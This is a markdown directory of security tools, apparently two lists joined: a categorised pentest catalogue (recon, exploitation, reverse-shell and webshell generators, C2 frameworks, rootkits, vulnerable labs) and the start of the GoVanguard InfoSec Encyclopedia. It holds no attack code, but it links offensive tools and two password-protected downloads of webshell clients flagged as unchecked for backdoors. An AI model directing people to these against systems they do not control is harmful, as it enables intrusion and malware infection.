Auxiliary](#privilege-escalation-auxiliary) * [C2](#C2) * [Golang Sec Tools](#Golang-Sec-Tools) * [Reporting Tools](#reporting-tools) * [Social Engineering](#Social-Engineering) * [System Services](#System-Services) * [Code Audit](#code-audit) * [Port Forwarding & Proxies](#port-forwarding--proxies) * [DevSecOps](#DevSecOps) * [RootKit](#RootKit) * [Cyber Range](#Cyber-Range) * [Vulnerability application](#vulnerability-application) * [Simulation range](#Simulation-range) ### Information Gathering #### Google Hacking * [GHDB](https://www.exploit-db.com/google-hacking-database/) - Google Hack Database * [SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/) - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project * [Katana](https://github.com/adnane-X-tebbaa/Katana) - A Python Tool For google Hacking #### Github * [GitHack](https://github.com/lijiejie/GitHack) - GitHack is a .git folder disclosure exploit. * [GitGraber](https://github.com/hisxo/gitGraber) - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services. * [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github. * [Gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations. #### Svn * [svnExploit](https://github.com/admintony/svnExploit) - Support for SVN source code disclosure of full version and Dump it. # Port Scan * [Nmap | Zenmap](https://nmap.org/) - Free and open source utility for network discovery and security auditing * [Masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously * [Ports](https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md) - Common service ports and exploitations * [Goby](https://gobies.org/) - Attack surface mapping #### OSINT * [theHarvester](https://github.com/laramies/theHarvester)- E-mails, subdomains and names Harvester - OSINT * [FOCA](https://github.com/ElevenPaths/FOCA) - Tool to find metadata and hidden information in the documents. * [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery * [Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys. * [EmailHarvester](https://github.com/maldevel/EmailHarvester) - Email addresses harvester * [Finalrecon](https://github.com/thewhiteh4t/FinalRecon) - The Last Web Recon Tool You'll Need. * [LittleBrother](https://github.com/lulz3xploit/LittleBrother) - Information gathering (OSINT) on a person (EU) ### Phishing * [gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit ### Vulnerability Analysis ### Web Applications #### CMS & Framwork Identification * [AngelSword](https://github.com/Lucifer1993/AngelSword) - CMS vulnerability detection framework * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner * [Wappalyzer](https://github.com/AliasIO/Wappalyzer) - Cross-platform utility that uncovers the technologies used on websites * [Whatruns](https://www.whatruns.com/) - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome) * [WhatCMS](https://github.com/HA71/WhatCMS) - CMS Detection and Exploit Kit based on Whatcms.org API * [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs > Online Tools * [Yunsee](http://www.yunsee.cn/finger.html) - Online website for to find the CMS footprint * [Bugscaner](http://whatweb.bugscaner.com/look/) - A simple online fingerprint identification system that supports hundreds of cms source code recognition * [WhatCMS online](https://whatcms.org/) - CMS Detection and Exploit Kit website Whatcms.org * [Tscan](https://scan.top15.cn/web/) - A online tool to get the informathion of website * [TideFinger](http://finger.tidesec.com/) - Fingerprinter Tool from TideSec Team #### Web Applications Proxies * [Burpsuite](https://portswigger.net/) - Burpsuite is a graphical tool for testing Web application security * [ZAP](https://github.com/zaproxy/zaproxy) One of the world’s most popular free security tools * [Mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. * [Broxy](https://github.com/rhaidiz/broxy) - An HTTP/HTTPS intercept proxy written in Go. #### Vulnerability Scanner * [Struts-Scan](https://github.com/Lucifer1993/struts-scan) - Struts2 vulnerability detection and utilization tools * [Nikto](https://github.com/sullo/nikto) - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items * [W3af](https://github.com/andresriancho/w3af/) - Web application attack and audit framework, the open source web vulnerability scanner * [Openvas](http://www.openvas.org/) - The world's most advanced Open Source vulnerability scanner and manager * [Openvas Docker](https://github.com/mikesplain/openvas-docker) * [Archery](https://github.com/archerysec/archerysec) - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities * [Taipan](https://github.com/enkomio/Taipan) - Web application vulnerability scanner * [Arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework #### Web Crawlers & Directory Brute Force * [Dirbrute](https://github.com/Xyntax/DirBrute) - Multi-thread WEB directory blasting tool (with dics inside) * [Dirbuster](https://sourceforge.net/projects/dirbuster/) - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers #### Docker Scanners * [Fuxi-Scanner](https://github.com/jeffzh3ng/Fuxi-Scanner) - open source network security vulnerability scanner, it comes with multiple functions. * [Xunfeng](https://github.com/ysrc/xunfeng) - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets * [WebMap](https://github.com/KHPROG55/WebMap) - Nmap Web Dashboard and Reporting ### Database Assessment ### Password Attacks * [Hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack * [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer * [Sparta](http://sparta.secforce.com/): [Document](./密码攻击/Sparta(斯巴达)/Readme.md) - Network Infrastructure Penetration Testing Tool * [Hashcat](https://github.com/hashcat/hashcat) - World's fastest and most advanced password recovery utility * [Patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. * [HackBrowserDat](https://github.com/moonD4rk/HackBrowserData) - Decrypt passwords/cookies/history/bookmarks from the browser ### Wireless Attacks #### Wireless Tools * [Fern Wifi cracker](https://github.com/savio-code/fern-wifi-cracker) - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected ### Reverse Engineering * [Ollydbg](http://www.ollydbg.de/) - OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows ### Exploitation Tools #### Vulnerability Search * [SPLOITUS](https://sploitus.com) - Sploitus is а convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities * [SearchSploit](https://github.com/offensive-security/exploitdb) - The official Exploit Database repository * [Getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits #### Cross-site Scripting(XSS) * [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project * [BlueLotus_XSSReceiver](https://github.com/firesunCN/BlueLotus_XSSReceiver) - XSS Receiver platform without SQL * [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript. * [Xsser-Varbaek](https://github.com/Varbaek/xsser) - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras * [Xsser-Epsylon](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. * [Xenotix](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework) - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework #### Sql Injection * [Sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool * [Sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap * [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api #### Command Injection * [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool #### File Include * [LFIsuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner * [Kadimus](https://github.com/P0cL4bs/Kadimus) - Kadimus is a tool to check sites to lfi vulnerability , and also exploit it * [Shellfire](https://github.com/unix-ninja/shellfire) - Exploitation shell for exploiting LFI, RFI, and command injection vulnerabilities * [LFIter2](https://github.com/3mrgnc3/LFIter2) - LFIter2 Local File Include (LFI) Tool - Auto File Extractor & Username Bruteforcer #### File Upload vulnerability * [Fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool #### XML External Entity Attack(XXE) * [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods * [Oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes #### Cross-site request forgery (CSRF) * [Deemon](https://github.com/tgianko/deemon/) - Deemon is a tool to detect CSRF in web application #### Exploit Framework * [POC-T](https://github.com/Xyntax/POC-T) - Pentest Over Concurrent Toolkit * [Pocsuite](https://github.com/knownsec/Pocsuite) - Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team * [Metasploit](https://github.com/rapid7/metasploit-framework) - The world’s most used penetration testing framework * [Venom](https://github.com/r00t-3xp10it/venom) - Shellcode generator/compiler/handler (metasploit) * [Empire](https://github.com/EmpireProject/Empire) - Empire is a PowerShell and Python post-exploitation agent * [Koadic](https://github.com/zerosum0x0/koadic) - Koadic C3 COM Command & Control - JScript RAT * [Viper](https://github.com/FunnyWolf/Viper) - metasploit-framework UI manager Tools #### Machine Learning * [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) - Fully automatic penetration test tool using Machine Learning * [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is a growing penetration test tool using Machine Learning * [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) - Fully automatically generate numerous injection codes for web application assessment #### Automate * [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated Mass Exploiter * [WinPwn](https://github.com/SecureThisShit/WinPwn) - Automation for internal Windows Penetrationtest / AD-Security ### Sniffing & Spoofng * [WireShark](https://github.com/wireshark/wireshark) - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems. * [Cain & able](http://www.oxid.it/cain.html) - Cain & Abel is a password recovery tool for Microsoft Operating Systems. ### Maintaining Access #### Shell * [Goshell](https://github.com/eze-kiel/goshell) - Generate reverse shells in command line with Go ! * [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - Python script wrote to automate the process of generating various reverse shells. * [Girsh](https://github.com/nodauf/Girsh) - Automatically spawn a reverse shell fully interactive for Linux or Windows victim * [Blueshell](https://github.com/whitehatnote/BlueShell) - Generate a reverse shells for RedTeam #### Web Shell * [Novahot](https://github.com/chrisallenlane/novahot) - A webshell framework for penetration testers. * [Awsome-Webshells](https://github.com/abhinavprasad47/Awsome-Webshells) - Collection of reverse shells ##### PHP * [B374K](https://github.com/b374k/b374k) - PHP Webshell with handy features * [DAws](https://github.com/dotcppfile/DAws) - Advanced Web Shell * [Weevely3](https://github.com/epinna/weevely3) - Weaponized web shell ##### Chopper kind Webshell * Chopper > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d * [AntSword](https://github.com/AntSwordProject/antSword) : [Document](https://doc.u0u.us/zh-hans/index.html) - AntSword is a cross-platform website management toolkit * [CKnife](https://github.com/Chora10/Cknife) - The cross platform webshell tool in java > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh * [Altman](https://github.com/keepwn/Altman) - The cross platform webshell tool in .NET * [Behinder](https://github.com/rebeyond/Behinder) - dynamic binary encryption webshell management client * [Godzilla](https://github.com/BeichenDream/Godzilla) - a Java tool to encrypt network traffic #### Privilege Escalation Auxiliary * [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target * [Windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - windows-kernel-exploits * [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2) - Next-Generation Linux Kernel Exploit Suggester * [Linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits) - linux-kernel-exploits Linux * [BeRoot](https://github.com/AlessandroZ/BeRoot) - Privilege Escalation Project - Windows / Linux / Mac * [PE-Linux](https://github.com/WazeHell/PE-Linux) - Linux Privilege Escalation Tool By WazeHell * [Portia](https://github.com/SpiderLabs/portia) - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised. #### C2 * [DeimosC2](https://github.com/DeimosC2/DeimosC2) - DeimosC2 is a Golang command and control framework for post-exploitation. * [Sliver](https://github.com/BishopFox/sliver) - Implant framework * [PHPSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈 * [Shad0w](https://github.com/bats3c/shad0w) - A post exploitation framework designed to operate covertly on heavily monitored environments (Win8、Win10) * [Covenant](https://github.com/cobbr/Covenant) - Covenant is a collaborative .NET C2 framework for red teamers. ### Golang Sec Tools > Tips: Golang is a excellent cross platform language for security. * [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity. * [ServerScan](https://github.com/Adminisme/ServerScan) - A high concurrency network scanning and service detection tool developed by golang. ### Reporting Tools * [Vulnreport](https://github.com/salesforce/vulnreport) - Open-source pentesting management and automation platform by Salesforce Product Security ### Social Engineering ### System Services ### Code Audit * [Cloc](https://github.com/AlDanial/cloc) - cloc counts blank lines, comment lines, and physical lines of source code in many programming languages * [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit * [Cobra-W](https://github.com/LoRexxar/Cobra-W) - Cobra for white hat * [Graudit](https://github.com/wireghoul/graudit) - Grep rough audit - source code auditing tool * [Rips](https://github.com/ripsscanner/rips) - A static source code analyser for vulnerabilities in PHP scripts ### Port Forwarding & Proxies * [EarthWorm](https://github.com/rootkiter/EarthWorm) - Tool for tunnel * [Termite](https://github.com/rootkiter/Termite/) - Tool for tunnel (Version 2) * [Frp](https://github.com/fatedier/frp) - A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet * [Nps](https://github.com/ehang-io/nps/) - A lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal. * [Goproxy](https://github.com/snail007/goproxy) - A high-performance, full-featured, cross platform proxy server * [ReGeorg](https://github.com/sensepost/reGeorg) - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn ### DevSecOps ### RootKit * [Beurk](https://github.com/unix-thrust/beurk) - BEURK Experimental Unix RootKit * [Bedevil](https://github.com/naworkcaj/bdvl) - LD_PRELOAD Linux rootkit (x86 & ARM) ### Audit Tools * [DevAudit](https://github.com/OSSIndex/DevAudit) - Open-source, cross-platform, multi-purpose security auditing tool ### Cyber Range #### Vulnerability application * [DVWA](https://github.com/ethicalhack3r/DVWA) - Damn Vulnerable Web Application (DVWA) * [WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons * [DSVW](https://github.com/stamparm/DSVW) - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes * [DVWS](https://github.com/snoopysecurity/dvws) - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities * [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security * [BWAPP](http://www.mmebvba.com/sites/bwapp/index.htm) - A buggy web application whit more than 100 vulnerabilities * [Sqli-lab](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based * [HackMe-SQL-Injection-Challenges](https://github.com/breakthenet/HackMe-SQL-Injection-Challenges) - Hack your friend's online MMORPG game - specific focus, sql injection opportunities * [XSS-labs](https://github.com/paralax/xss-labs) - Small set of scripts to practice exploit XSS and CSRF vulnerabilities * [SSRF-lab](https://github.com/m6a-UdS/ssrf-lab) - Lab for exploring SSRF vulnerabilities * [SSRF_Vulnerable_Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack * [LFI-labs](https://github.com/paralax/lfi-labs) - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns * [Commix-testbed](https://github.com/commixproject/commix-testbed) - A collection of web pages, vulnerable to command injection flaws * [File-Upload-Lab](https://github.com/LunaM00n/File-Upload-Lab) - Damn Vulnerable File Upload V 1.1 * [Upload-labs](https://github.com/c0ny1/upload-labs) - A summary of all types of uploading vulnerabilities for you * [XXE-Lab](https://github.com/c0ny1/xxe-lab) - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc * [MSFvenom-gui](https://github.com/ssooking/msfvenom-gui) - gui tool to create normal payload by msfvenom #### Simulation range * [Fopnp](https://github.com/brandon-rhodes/fopnp/tree/m/playground) - A Network Playground for 《Foundations of Python Network Programming》 * [CyberRange](https://github.com/secdevops-cuse/CyberRange) - The Open-Source AWS Cyber Range
# GoVanguard InfoSec Encyclopedia This is an ongoing compilation of resources we have found helpful and tools we use. If you're new to InfoSec and are looking for a concentrated list of resources to get started, check out [Getting into InfoSec and Cybersecurity](https://github.com/GoVanguard/Getting-into-InfoSec-and-Cybersecurity). ## Table of Contents - [Resources](#resources)</summary> * [Information Security Certifications](#information-security-certifications) * [Books](#books) * [Lockpicking Resources](#lockpicking-resources) * [Social Engineering Articles](#social-engineering-articles) * [Conferences](#conferences) * [Online Videos](#online-vidoes) * [Free Online Courses](#free-online-courses) * [Training Resources](#training-resources) * [Hacking References And Cheatsheets](#hacking-references-and-cheatsheets) * [Training And Practice Exercises](#training-and-practice-exercises) * [Informative Youtube Channels](#informative-youtube-channels) * [Illustrations and Presentations](#illustrations-and-presentations) * [Clearnet Exploit Databases](#clearnet-exploit-databases) * [Awesome Master Lists](#awesome-master-lists) * [Knowledge Bases](#knowledge-bases) - [OSINT Tools Used](#osint-tools-used) * [General OSINT Tools](#general-osint-tools) * [Crypto OSINT Search](#crypto-osint-search) * [Government Record Search](#government-record-search) * [National Search Engines](#national-search-engines) * [Meta Search](#meta-search) * [Visual Search and Clustering Search Engines](#visual-search-and-clustering-search-engines) * [Similar Sites Search](#similar-sites-search) * [Document and Slides Search](#document-and-slides-search) * [Pastebin Search](#pastebin-search) * [Code Search](#code-search) * [Real-Time Search, Social Media Search, and General Social Media Tools](#real-time-search-social-media-search-and-general-social-media-tools) * [Twitter Search](#twitter-search) * [Facebook Search](#facebook-search) * [Instagram Search](#instagram-search) * [Pinterest Search](#pinterest-search) * [Reddit Search](#reddit-search) * [VKontakte Search](#vkontakte-search) * [LinkedIn](#linkedin) * [Blog Search](#blog-search) * [Forums and Discussion Boards Search](#forums-and-discussion-boards-search) * [Username Check](#username-check) * [Personel Investigations](#personel-investigations) * [E-mail Search / E-mail Check](#e-mail-search--e-mail-check) * [Phone Number Research](#phone-number-research) * [Company Research](#company-research) * [Domain and IP Research](#domain-and-ip-research) * [Keywords Discovery and Research](#keywords-discovery-and-research) * [Web History and Website Capture](#web-history-and-website-capture) * [Language Tools](#language-tools) * [Image Search](#image-search) * [Image Analysis](#image-analysis) * [Data and Statistics](#data-and-statistics) * [Web Monitoring](#web-monitoring) * [OCR Tools](#ocr-tools) * [Collaboration and Project Management](#collaboration-and-project-management) * [Communication Tools](#communication-tools) * [Calendars and Scheduling](#calendars-and-scheduling) * [Mind Mapping, Concept Mapping and Idea Generation Tools](#mind-mapping-concept-mapping-and-idea-generation-tools) * [Social Network Analysis](#social-network-analysis) * [DNS Search And Enumeration](#dns-search-and-enumeration) * [Network Reconnaissance Tools](#network-reconnaissance-tools) - [Exploitation Enumeration And Data Recovery Tools](#exploitation-enumeration-and-data-recovery-tools) * [Penetration Testing OS Distributions](#penetration-testing-os-distributions) * [Multi-paradigm Frameworks](#multi-paradigm-frameworks) * [Network Vulnerability Scanners](#network-vulnerability-scanners) * [Web Vulnerability Scanners](#web-vulnerability-scanners) * [Web Exploitation](#web-exploitation) * [Network Tools](#network-tools) * [Protocol Analyzers and Sniffers](#protocol-analyzers-and-sniffers) * [Proxies and MITM Tools](#proxies-and-mitm-tools) * [Wireless Network Tools](#wireless-network-tools) * [Transport Layer Security Tools](#transport-layer-security-tools) * [Cryptography](#cryptography) * [Post-Exploitation](#post-exfiltration) * [Exfiltration Tools](#exfiltration-tools) * [Static Analyzers](#static-analyzers) * [Dynamic Analyzers](#dynamic-analyzers) * [Hex Editors](#hex-editors) * [File Format Analysis Tools](#file-format-analysis-tools) * [Anti-Virus Evasion Tools](#anti-virus-evasion-tools) * [Hash Cracking Tools](#hash-cracking-tools) * [Windows Utilities](#windows-utilities) * [GNU Linux Utilities](#gnu-linux-utilities) * [macOS Utilities](#macos-utilities) * [Social Engineering Tools](#social-engineering-tools) * [Anonymity Tools](#anonymity-tools) * [Reverse Engineering Tools](#reverse-engineering-tools) * [Side-channel Tools](#side-channel-tools) * [Forensic Tools](#forensic-tools) * [Memory Analysis](#memory-analysis) * [Memory Imaging Tools](#memory-imaging-tools) * [Incident Response](#incident-response) * [Honeypot Tools](#honeypot-tools) * [Monitoring and IDS-IPS](#monitoring-and-ids-ips) * [Physical Tools](#physical-tools) * [Adversary Emulation](#adversary-emulation) * [All in one Incident Response Tools](#all-in-one-incident-response-tools) * [Communities](#communities) * [Disk Image Creation Tools](#disk-image-creation-tools) * [Evidence Collection Tools](#evidence-collection-tools) * [Incident Management Tools](#incident-management-tools) * [Linux Forensics Distributions](#linux-forensics-distributions) * [Linux Evidence Collection](#linux-evidence-collection) * [Log Analysis Tools](#log-analysis-tools) * [OSX Evidence Collection](#osx-evidence-collection) * [Incident Response Playbooks](#playbooks) * [Process Dump Tools](#process-dump-tools) * [Sandboxing/reversing tools](#sandboxingreversing-tools) * [Timeline tools](#timeline-tools) * [Windows Evidence Collection](#windows-evidence-collection) * [Other](#other) - [License](#license) --------------------------------------------------------------------------------------------------------------------------------------- ### Resources #### Information Security Certifications * [Certified Ethical Hacker](https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/) * [Certified Information Systems Security Professional (CISSP)](https://www.isc2.org/Certifications/CISSP) * [Certified Penetration Testing Engineer (CPTE)](https://www.mile2.com/penetration-testing-engineer-outline/) * [CompTIA Security+](https://www.comptia.org/certifications/security) * [GIAC Security Essentials (GSEC)](https://www.giac.org/certification/security-essentials-gsec) * [Kali Linux Certified Professional (KLCP)](https://home.pearsonvue.com/kali) * [Offensive Security Certified Expert (OSCE)](https://www.offensive-security.com/ctp-osce/) * [Offensive Security Certified Professional (OSCP)](https://www.offensive-security.com/pwk-oscp/) * [Offensive Security Exploitation Expert (OSEE)](https://www.offensive-security.com/awe-osee/) * [Offensive Security Web Expert (OSWE)](https://www.offensive-security.com/awae-oswe/) * [Offensive Security Wireless Professional (OSWP)](https://www.offensive-security.com/wifu-oswp/) * [Practical Network Penetration Tester (PNPT)](https://certifications.tcm-sec.com/pnpt/) * [HTB Certified Bug Bounty Hunter (HTB BBH)](https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter/) * [HTB Certified Penetration Testing Specialist (HTB CPTS)](https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist/) * [eLearnSecurity Junior Penetration Tester (eJPT)](https://elearnsecurity.com/product/ejpt-certification/) #### Books * A Bug Hunter's Diary: A Guided Tour Through the Wilds of Software Security * A Short Course on Computer Viruses * AVIEN Malware Defense Guide for the Enterprise * Advanced Penetration Testing: Hacking the World's Most Secure Networks * Applied Cryptography: Protocols, Algorithms and Source Code in C * Applied Network Security Monitoring: Collection, Detection, and Analysis * Black Hat Python: Python Programming for Hackers and Pentesters * Bug Bounty Bootcamp By Vickie Li * Blue Team Handbook: Incident Response Edition: A condensed field guide for the Cyber Security Incident Responder * Bulletproof SSL and TLS: Understanding and Deploying SSL/TLS and PKI to Secure Servers and Web Applications * CEH Certified Ethical Hacker All-in-One Exam Guide * CISSP All-in-One Exam Guide * CISSP: Certified Information Systems Security Professional Study Guide * CISSP](ISC)2 Certified Information Systems Security Professional Official Study Guide * Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon * Cryptography Engineering: Design Principles and Practical Applications * Cyber War: The Next Threat to National Security and What to Do About It * Cybersecurity - Protecting Critical Infrastructures from Cyber Attack and Cyber Warfare * Cybersecurity and Cyberwar: What Everyone Needs to Know * Cybersecurity and Human Rights in the Age of Cyberveillance * Cyberspies: The Secret History of Surveillance, Hacking, and Digital Espionage * Essentials of Cybersecurity * Future Crimes: Inside the Digital Underground and the Battle for Our Connected World * Ghost in the Wires: My Adventures as the World's Most Wanted Hacker * Hacked Again * Hacking Exposed 7 * Hacking: The Art of Exploitation * How Linux Works: What every superuser should know * Information Assurance Handbook: Effective Computer Security and Risk Management Strategies * Linux Shell Scripting Cookbook * Network Forensics: Tracking Hackers through Cyberspace * Network Security Through Data Analysis: Building Situational Awareness * Penetration Testing: A Hands-On Introduction to Hacking * Practical Malware Analysis: A Hands-On Guide to Dissecting Malicious Software * Practice of Network Security Monitoring * Protecting Your Internet Identity: Are You Naked Online? * Protection and Security on the Information Superhighway * Reversing: Secrets of Reverse Engineering * Rtfm: Red Team Field Manual * Security Metrics, A Beginner's Guide * Spam Nation: The Inside Story of Organized Cybercrime-from Global Epidemic to Your Front Door * Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection * TCP/IP Illustrated * The Art of Computer Virus Research and Defense * The Art of Deception: Controlling the Human Element of Security * The Art of Memory Forensics * The Beginner's Guide to Information Security * The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography * The Computer Incident Response Planning Handbook: Executable Plans for Protecting Information at Risk * The Cyber Skill Gap * The Hacker Playbook: Practical Guide To Penetration Testing * The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler * The Ncsa Guide to PC and Lan Security * The Shellcoder's Handbook: Discovering and Exploiting Security Holes * The Tao of Network Security Monitoring: Beyond Intrusion Detection * The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws * Thinking Security: Stopping Next Year's Hackers * Understanding Cryptography: A Textbook for Students and Practitioners * We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency * Web Application Vulnerabilities: Detect, Exploit, Prevent * Windows Internals * Worm: The First Digital World War * [A Search Engine Backed by Internet-Wide Scanning - Ariana Mirian](https://censys.io/static/censys.pdf) * [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/dp/1119367689/) * [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](https://www.packtpub.com/product/advanced-penetration-testing-for-highly-secured-environments-the-ultimate-security-guide/9781849517744) * [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](https://www.amazon.com/dp/0071828362) * [Android Hackers Handbook by Joshua J. Drake et al., 2014](https://www.wiley.com/en-us/Android+Hacker%27s+Handbook-p-9781118608647) * [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](https://www.amazon.com/dp/1593275900) * [Btfm: Blue Team Field Manual by Alan White and Ben Clark](https://www.amazon.com/dp/154101636X) * [Bug Hunter's Diary by Tobias Klein, 2011](https://nostarch.com/bughunter) * [CIA Lock Picking Field Operative Training Manual](https://www.scribd.com/doc/7207/CIA-Lock-Picking-Field-Operative-Training-Manual) * [Car Hacker's Handbook by Craig Smith, 2016]( https://nostarch.com/carhacking) * [CompTIA Security+ SY0-501 Certification Study Guide](https://www.comptia.org/training/books/security-sy0-501-study-guide) * [Complete Guide to Shodan](https://leanpub.com/shodan) * [Dfir intro](https://sroberts.medium.com/introduction-to-dfir-d35d5de4c180) * [Eddie the Wire books](https://www.thriftbooks.com/a/eddie-the-wire/397834/) * [Essentials of Enterprise Network Security](https://res.cloudinary.com/peerlyst/image/upload/v1499385854/post-attachments/Essentials_of_Enterprise_Network_Security_wiqsvc.pdf) * [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/) * [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](https://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/) * [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](https://www.amazon.com/dp/0071832386) * [Hacking the Xbox by Andrew Huang, 2003](https://nostarch.com/xbox) * [Holistic Info-Sec for Web Developers](bundle)](https://leanpub.com/b/holisticinfosecforwebdevelopers) * [Kali Linux Revealed](https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf) * [Keys to the Kingdom by Deviant Ollam, 2012](https://www.elsevier.com/books/keys-to-the-kingdom/ollam/978-1-59749-983-5) * [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0) * [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](https://www.wiley.com/en-us/Malware+Analyst%27s+Cookbook+and+DVD%3A+Tools+and+Techniques+for+Fighting+Malicious+Code-p-9780470613030) * [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://nostarch.com/metasploit) * [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](https://www.amazon.com/dp/B008CG8CYU/) * [Network Security Assessment by Chris McNab](https://www.amazon.com/dp/B0043EWUR0) * [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](https://nmap.org/book/) * [No Tech Hacking by Johnny Long & Jack Wiles, 